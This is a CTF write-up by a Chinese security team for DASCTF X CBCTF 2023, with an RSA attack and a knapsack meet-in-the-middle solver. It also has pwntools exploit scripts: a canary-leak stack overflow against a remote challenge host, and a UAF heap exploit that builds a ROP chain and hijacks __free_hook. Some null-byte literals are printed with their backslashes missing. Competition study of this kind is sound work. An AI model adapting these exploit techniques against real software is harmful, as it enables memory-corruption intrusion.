EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。
欢迎各位师傅加入EDI,大家一起打CTF,一起进步。(诚招re crypto pwn方向的师傅)有意向的师傅请联系邮箱[email protected]、[email protected](带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等)。
01
Crypto
1
ezrsa
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 2023/10/21 11:31
import binascii
from sage.all import *
# Challenge parameters as given by the task.
# n1 is used below as the modulus for the Jacobi-symbol bit recovery,
# n2 is the modulus both related ciphertexts are reduced against in attack().
n1 = 65634094430927080732256164808833233563732628654160389042977689628512527168256899310662239009610512772020503283842588142453533499954947692968978190310627721338357432052800695091789711809256924541784954080619073213358228083200846540676931341013554634493581962527475555869292091755676130810562421465063412235309
n2 = 103670293685965841863872863719573676572683187403862749665555450164387906552249974071743238931253290278574192713467491802940810851806104430306195931179902098180199167945649526235613636163362672777298968943319216325949503045377100235181706964846408396946496139224344270391027205106691880999410424150216806861393
# Two (exponent, additive noise, ciphertext) triples of the same unknown message.
(e1, noise1, c1) = (1743, 44560588075773853612820227436439937514195680734214431948441190347878274184937952381785302837541202705212687700521129385632776241537669208088777729355349833215443048466316517110778502508209433792603420158786772339233397583637570006255153020675167597396958251208681121668808253767520416175569161674463861719776, 65643009354198075182587766550521107063140340983433852821580802983736094225036497335607400197479623208915379722646955329855681601551282788854644359967909570360251550766970054185510197999091645907461580987639650262519866292285164258262387411847857812391136042309550813795587776534035784065962779853621152905983)
(e2, noise2, c2) = (1325, 35282006599813744140721262875292395887558561517759721467291789696459426702600397172655624765281531167221787036009507833425145071265739486735993631460189629709591456017092661028839951392247601628468621576100035700437892164435424035004463142959219067199451575338270613300215815894328788753564798153516122567683, 50327632090778183759544755226710110702046850880299488259739672542025916422119065179822210884622225945376465802069464782311211031263046593145733701591371950349735709553105217501410716570601397725812709771348772095131473415552527749452347866778401205442409443726952960806789526845194216490544108773715759733714)
# Ciphertext of the final stage; decrypted at the end of the script with the modulus p*q.
enc = 124349762993424531697403299350944207725577290992189948388824124986066269514204313888980321088629462472088631052329128042837153718129149149661961926557818023704330462282009415874674794190206220980118413541269327644472633791532767765585035518183177197863522573410860341245613331398610013697803459403446614221369
def attack(c1, c2, e1, e2, noise1, noise2, n2):
    """Recover the message shared by two related ciphertexts.

    Each ciphertext is modelled as a polynomial over Z/n2Z in the unknown
    message m: (m + noise_i)^e_i - c_i.  Their polynomial GCD is expected to
    be a monic linear factor x - m, whose constant term is -m.
    """
    ring = PolynomialRing(Zmod(n2), name='x')
    x = ring.gen()
    polys = [(x + noise1) ** e1 - c1, (x + noise2) ** e2 - c2]

    def poly_gcd(a, b):
        # Plain Euclid on polynomials; monic() makes the result canonical.
        while b:
            a, b = b, a % b
        return a.monic()

    common = poly_gcd(*polys)
    return -common[0]
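# Stage 1: recover the first message from the two related ciphertexts.
m1 = attack(c1, c2, e1, e2, noise1, noise2, n2)
print(m1)

# Stage 2: a fresh RSA instance.  p is hard-coded here; its derivation is not
# part of this script (presumably taken from the stage-1 output).
p = 13189337905641321257372188436353844418280745284875462357019668708167547026960641869513283218672677712590326347601424108528959315675307896082223561007980457

# enc.txt is expected to hold one integer per line; anything that is not an
# integer (blank lines, labels) is skipped explicitly rather than by a bare except.
with open("enc.txt", "r", encoding="utf-8") as f:
    cipher = f.read()
c = []
for line in cipher.split("\n"):
    try:
        c.append(int(line))
    except ValueError:
        continue

# Each value contributes one bit of q: Jacobi symbol 1 modulo n1 -> '1',
# anything else -> '0'.  The first value is the least significant bit,
# hence the reversal before converting the bit string.
bits = "".join("1" if jacobi_symbol(s, n1) == 1 else "0" for s in c)
q = int(bits[::-1], 2)
print(q)

moduls = p * q
phi = (p - 1) * (q - 1)
import gmpy2
d = int(gmpy2.invert(65537, phi))  # private exponent for e = 65537
print(d)
m = pow(enc, d, moduls)
from Crypto.Util.number import long_to_bytes
print(long_to_bytes(m))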
2
CBbackpack
每6位一组,一共8组,一共48位
每组0、1各有3个,一共有 $C_6^3 = 20$ 种可能
利用中间相遇攻击爆破
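import hashlib
import itertools

# Public knapsack weights: 8 groups of 6 (48 in total) and the target sum.
l = [65651991706497, 247831871690373, 120247087605020, 236854536567393, 38795708921144, 256334857906663, 120089773523233, 165349388120302, 123968326805899, 79638234559694, 259559389823590, 256776519514651, 107733244474073, 216508566448440, 39327578905012, 118682486932022, 263357223061004, 132872609024098, 44605761726563, 24908360451602, 237906955893793, 204469770496199, 7055254513808, 221802659519968, 169686619990988, 23128789035141, 208847144870760, 272339624469135, 269511404473473, 112830627321371, 73203551744776, 42843503010671, 118193938825623, 49625220390324, 230439888723036, 241486656550572, 107149406378865, 233503862264755, 269502011971514, 181805192674559, 152612003195556, 184127512098087, 165959151027513, 188723045133473, 241615906682300, 216101484550038, 81190147709444, 124498742419309]
x = 4051501228761632

GROUP = 6  # weights per group
PICK = 3   # weights chosen per group (three 1-bits in every 6-bit group)

# Candidate partial sums per group, kept in itertools.combinations order so
# that an index into ll[g] identifies which three positions of group g were chosen.
ll = [
    [sum(combo) for combo in itertools.combinations(l[g * GROUP:GROUP * (g + 1)], PICK)]
    for g in range(len(l) // GROUP)
]
CHOICES = len(ll[0])  # C(6, 3) == 20


def _choice_indices(flat, base, count=4):
    """Decode a flat product() index into per-group choice indices, most significant first.

    product() over `count` groups of `base` candidates enumerates
    flat = ((c0 * base + c1) * base + c2) * base + c3, so repeated divmod
    recovers (c0, c1, c2, c3).
    """
    digits = []
    for _ in range(count):
        flat, digit = divmod(flat, base)
        digits.append(digit)
    return tuple(reversed(digits))


# Meet in the middle: every combination of the first four groups and of the
# last four groups.  product() walks the groups in the same nested order as
# an explicit four-deep loop, so indices decode with _choice_indices().
first_half = [sum(t) for t in itertools.product(*ll[:4])]
second_half = [sum(t) for t in itertools.product(*ll[4:])]

# For a second-half sum s2 the first half must contribute x - s2; map that
# complement to the first index it occurs at, giving an O(1) lookup instead
# of a linear search of second_half for every first-half candidate.
complement_index = {}
for j, s2 in enumerate(second_half):
    complement_index.setdefault(x - s2, j)

# Resume point carried over from the author's earlier run, which reported the
# match at 36690 / 141524.  Starting from 0 would also work, but could surface
# a different solution first if the instance has more than one.
START = 36600
ab = None
for i in range(START, len(first_half)):
    j = complement_index.get(first_half[i])
    if j is not None:
        print(i, j)
        ab = _choice_indices(i, CHOICES) + _choice_indices(j, CHOICES)
        break
if ab is None:
    raise SystemExit("no meet-in-the-middle match found for x")

# Sanity check: the selected partial sums reproduce the target exactly.
assert sum(ll[g][ab[g]] for g in range(len(ll))) == x

# Expand each group's choice index into the chosen positions, then into a
# 48-entry 0/1 vector in group order.
index = list(itertools.combinations(range(GROUP), PICK))
q = [index[k] for k in ab]
ml = [1 if pos in chosen else 0 for chosen in q for pos in range(GROUP)]

flag = 'DASCTF{' + hashlib.sha256(''.join(str(b) for b in ml).encode()).hexdigest() + '}'
print(flag)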
02
Pwn
1
Guestbook
泄露canary 后栈溢出。
from pwn import *
#from LibcSearcher import *
# Target configuration: `debug` selects a local process over the remote service.
context(os='linux', arch='amd64', log_level='debug')
#context.terminal = ['tmux','splitw','-h']
filename = './GuestBook'
debug = 0
ip = 'node4.buuoj.cn'
port = 26998
p = process(filename) if debug else remote(ip, port)
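# Thin I/O helpers over the pwntools tube `p`.
ru = lambda a: p.recvuntil(a)
r = lambda n: p.recv(n)
sla = lambda a, b: p.sendlineafter(a, b)
sa = lambda a, b: p.sendafter(a, b)
sl = lambda a: p.sendline(a)
s = lambda a: p.send(a)
# Address-leak helpers: read up to a marker byte (0xf7 / 0x7f, the usual high
# byte of a 32-/64-bit libc address) and unpack the trailing 4 or 6 bytes,
# zero-padded to a full word.  The fill must be a single byte, b'\x00' --
# bytes.ljust() raises TypeError for a longer fill.
l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00'))
int16 = lambda data: int(data, 16)
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))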
def inter():
    """Hand the tube over to the user for interactive use."""
    p.interactive()
def debu(cmd=''):
    """Attach gdb to the running process with the optional gdb script *cmd*, then pause."""
    gdb.attach(p, cmd)
    pause()
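def get_addr():
    """Read up to the next 0x7f byte and unpack the last six bytes as a 64-bit address.

    0x7f is the usual high byte of a 64-bit libc address; the six bytes are
    padded to a full word with a single zero byte (ljust rejects a longer fill).
    """
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))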
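def get_sysbin(libc_base, libc):
    """Return the rebased addresses of `system` and of a NUL-terminated "/bin/sh" in *libc*.

    *libc* is expected to expose a symbol table as .sym and a byte search as
    .search (the pwntools ELF interface); both offsets are added to *libc_base*.
    """
    system_addr = libc_base + libc.sym['system']
    binsh_addr = libc_base + next(libc.search(b'/bin/sh\x00'))
    return system_addr, binsh_addr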
def csu(rdi, rsi, rdx, rip, gadget):
    """Pack gadget, 0, 1, rip, rdi, rsi, rdx and gadget - 0x1a, in that order, as 64-bit words."""
    words = (gadget, 0, 1, rip, rdi, rsi, rdx, gadget - 0x1a)
    return b''.join(p64(w) for w in words)
# Leak (per the write-up: leak the canary, then overflow).  The 24-byte name is
# echoed back and the 8 bytes that follow it are read as the canary.
sla(b'name: ',b'a'*24)
ru(b'a'*24)
canary = u64(r(0x8))
print("canary :",hex(canary))
#debu('b *0x40143f')
sla(b'leave(MAX 4): ',b'4')
for i in range(2):
    sl(b'aaaa')
# Overflow: padding, the canary written back (the +0x6 adjustment is not
# explained on the page -- presumably compensates for a byte altered during the
# leak; verify against the binary), saved-rbp filler, then the return address.
payload = b'b'*(0x38+0x20)+p64(canary+0x6)+b'c'*0x8+p64(0x00000000004012c0)
sl(payload)
# NOTE(review): b'x00' is printed with its backslash stripped; a single null
# byte would be b'\x00'.
sl(b'b'*0x38+b'x00')
inter()
2
EASYBOX
3
Binding
这一题在比赛期间没有做出来,非常可惜,感觉最后就差一点点,就是临门一脚的事情,所以赛后又花了点时间仔细看了看这道题,花了一个多小时就出了,难度算比较中等水平,主要是中间卡了很长一段时间。
这一题的漏洞也非常简单,就是 UAF 漏洞。
基本思路就是:
1. 通过 UAF 漏洞来泄露 libc 的基地址,接着得到 environ 地址,以此泄露栈地址,然后通过栈地址来泄露出 ELF 基地址。(一开始是尝试通过 environ+0x20 来泄露出 ELF 基地址,但是打印会被截断,寄)再通过 show 函数来泄露堆地址。
2. 通过 edit 函数将 EDIT_TIME 修改为 0xff,使得可以任意次数修改。
3. 在栈上构造 ORW 的 ROP 链。(当时快结束时已经做完这一步,但是 main 居然没有正常返回,然后无了)
4.最后在 free_hook 地址位置写上 setcontext+0x3d ,使得跳转到构造的ROP链上。
from pwn import *
#from LibcSearcher import *
# Target configuration: `debug` selects a local process over the remote service;
# the libc below is the one the write-up resolved symbols against.
context(os='linux', arch='amd64', log_level='debug')
#context.terminal = ['tmux','splitw','-h']
filename = './binding'
debug = 0
ip = '127.0.0.1'
port = 9999
libc = ELF('/home/roach/glibc-patcher/libs/amd64/2.31-0ubuntu9.9_amd64/libc.so.6')
p = process(filename) if debug else remote(ip, port)
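# Thin I/O helpers over the pwntools tube `p`.
ru = lambda a: p.recvuntil(a)
r = lambda n: p.recv(n)
sla = lambda a, b: p.sendlineafter(a, b)
sa = lambda a, b: p.sendafter(a, b)
sl = lambda a: p.sendline(a)
s = lambda a: p.send(a)
# Address-leak helpers: read up to a marker byte (0xf7 / 0x7f, the usual high
# byte of a 32-/64-bit libc address) and unpack the trailing 4 or 6 bytes,
# zero-padded to a full word.  The fill must be a single byte, b'\x00' --
# bytes.ljust() raises TypeError for a longer fill.
l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00'))
int16 = lambda data: int(data, 16)
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))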
def inter():
    """Hand the tube over to the user for interactive use."""
    p.interactive()
def debu(cmd=''):
    """Attach gdb to the running process with the optional gdb script *cmd*, then pause."""
    gdb.attach(p, cmd)
    pause()
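def get_addr():
    """Read up to the next 0x7f byte and unpack the last six bytes as a 64-bit address.

    0x7f is the usual high byte of a 64-bit libc address; the six bytes are
    padded to a full word with a single zero byte (ljust rejects a longer fill).
    """
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))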
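def get_sysbin(libc_base, libc):
    """Return the rebased addresses of `system` and of a NUL-terminated "/bin/sh" in *libc*.

    *libc* is expected to expose a symbol table as .sym and a byte search as
    .search (the pwntools ELF interface); both offsets are added to *libc_base*.
    """
    system_addr = libc_base + libc.sym['system']
    binsh_addr = libc_base + next(libc.search(b'/bin/sh\x00'))
    return system_addr, binsh_addr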
def csu(rdi, rsi, rdx, rip, gadget):
    """Pack gadget, 0, 1, rip, rdi, rsi, rdx and gadget - 0x1a, in that order, as 64-bit words."""
    words = (gadget, 0, 1, rip, rdi, rsi, rdx, gadget - 0x1a)
    return b''.join(p64(w) for w in words)
def add(idx, size, content):
    """Menu option 1: create slot *idx* with *size* bytes and send *content* raw (no trailing newline)."""
    sla(b'choice:', b'1')
    for prompt, value in ((b'Idx:', idx), (b'Size:', size)):
        sla(prompt, str(value).encode())
    sa(b'Content:', content)
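def edit(idx, content1, content2):
    """Menu option 2: send two raw writes for slot *idx*.

    The script waits for the prompts 'context1: ' and 'context2: ' each
    followed by a newline before sending; the newline is part of the marker.
    """
    sla(b'choice:', b'2')
    sla(b'Idx:', str(idx).encode())
    sa(b'context1: \n', content1)
    sa(b'context2: \n', content2)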
def show(idx, choice):
    """Menu option 3: display slot *idx*; *choice* (bytes) selects the sub-option."""
    steps = (
        (b'choice:', b'3'),
        (b'choice:', choice),
        (b'Idx:', str(idx).encode()),
    )
    for prompt, value in steps:
        sla(prompt, value)
def delete(idx):
    """Menu option 4: free slot *idx*."""
    sla(b'choice:', b'4')
    sla(b'Idx:', str(idx).encode())
# NOTE(review): every b'x00' / b'./flagx00x00' below is printed with its
# backslashes stripped; each x00 stands for a single b'\x00' byte.

# --- Step 1 (per the write-up): leak libc, stack, ELF and heap addresses via the UAF ---
for i in range(0xb):
    add(i,0x150,b'a'*8)
for i in range(0x8):
    delete(i)
# Slot 7 is shown after being freed; the value read is a libc pointer.
show(7,b'0')
ru(b'context: ')
leak = get_addr()
print("leak : ",hex(leak))
# 0x1ecbe0: offset of the leaked pointer inside the libc configured above (not derived here).
libc_base = leak - 0x1ecbe0
print("libc_base : ",hex(libc_base))
stack_addr = libc_base+libc.sym['environ']
print("stack address : ",hex(stack_addr))
# Presumably overflows from slot 0xb into the freed slot 7 so that show(7)
# prints what environ points at, i.e. a stack address -- verify against the binary.
payload = b'a'*(0x150+0x8)+p64(0x110)+p64(stack_addr)
add(0xb,0x1e0,payload)
show(7,b'0')
ru(b'context: ')
stack = get_addr()-0x100
print("stack : ",hex(stack))
# Same pattern through slot 8 to read a code pointer from the stack and rebase the ELF.
delete(8)
payload = b'a'*(0x1d0+0x8)+p64(0x110)+p64(stack-0x20)
add(0xc,0x200,payload)
show(8,b'0')
ru(b'context: ')
elf_base = u64(r(6).ljust(8, b'x00'))-0x1990
print("elf_base : ",hex(elf_base))
#debu('b show')
# Heap address from show()'s second sub-option (nine bytes of prefix are skipped).
show(0xb,b'1')
r(9)
heap = u64(r(6).ljust(8, b'x00'))
print("heap : ",hex(heap))

# --- Step 2: set EDIT_TIME (at elf_base+0x4010) to 0xff so edit() can be used without limit ---
edit(9,p64(elf_base+0x4010),p64(0xff))

# --- Step 3: open/read/write/exit chain, written onto the stack one byte per edit() ---
pop_rdi = elf_base+0x0000000000001a13
pop_rsi = libc_base+0x000000000002601f
pop_rdx = libc_base+0x0000000000142c92
openfile = libc_base+libc.sym['open']
readfile = libc_base+libc.sym['read']
writefile = libc_base+libc.sym['write']
exits = libc_base+libc.sym['exit']
# First word (heap+0xbf0) is the filename pointer consumed by the pop_rdi that
# payload2 below transfers control to; then open(name, 0), read(3, heap, 0x100),
# write(1, heap, 0x100), exit(0).
payload = p64(heap+0xbf0)+p64(pop_rsi)+p64(0x0)+p64(openfile)
payload += p64(pop_rdi)+p64(0x3)+p64(pop_rsi)+p64(heap)+p64(pop_rdx)+p64(0x100)+p64(readfile)
payload += p64(pop_rdi)+p64(0x1)+p64(pop_rsi)+p64(heap)+p64(pop_rdx)+p64(0x100)+p64(writefile)
payload += p64(pop_rdi)+p64(0x0)+p64(exits)
'''
0x0000000000151990 : mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
'''
# edit(9, address, value) acts as a byte-wise write here; each edit writes one
# byte of the chain at stack+i.
for i in range(len(payload)):
    edit(9,p64(stack+i),payload[i:i+1].ljust(8,b'x00'))

# --- Step 4: __free_hook -> the gadget quoted above, which reaches setcontext+0x3d ---
free_hook = libc_base+libc.sym['__free_hook']
setcontext = libc_base+libc.sym['setcontext']+0x3d
magic_gadgets = libc_base+0x0000000000151990
#debu('b *$rebase(0x16a0)')
for i in range(8):
    edit(9,p64(free_hook+i),p64(magic_gadgets)[i:i+1].ljust(8,b'x00'))
#0xe -> address = heap+0xbe0
# Chunk contents consumed by the gadget/setcontext: a pointer at +8, the
# './flag' name, setcontext at +0x20, and at 0xa0 the new rsp (stack) and rip
# (pop_rdi) so execution continues on the chain written above.
payload2 = p64(0x0)+p64(heap+0xbe0)+b'./flagx00x00'+p64(0x0)+p64(setcontext)
payload2 = payload2.ljust(0xa0,b'x00')
payload2 = payload2+p64(stack)+p64(pop_rdi)
add(0xd,0x150,payload2)
print("setcontext : ",hex(setcontext))
print("magic gadgets :",hex(magic_gadgets))
print("free hook :",hex(free_hook))
print("libc_base : ",hex(libc_base))
print("stack : ",hex(stack))
print("elf_base : ",hex(elf_base))
print("heap : ",hex(heap))
#debu()
# Freeing slot 0xd invokes the hook.
delete(0xd)
inter()
原文始发于微信公众号(EDI安全):DASCTF X CBCTF 2023|无畏者先行- WriteUp By EDISEC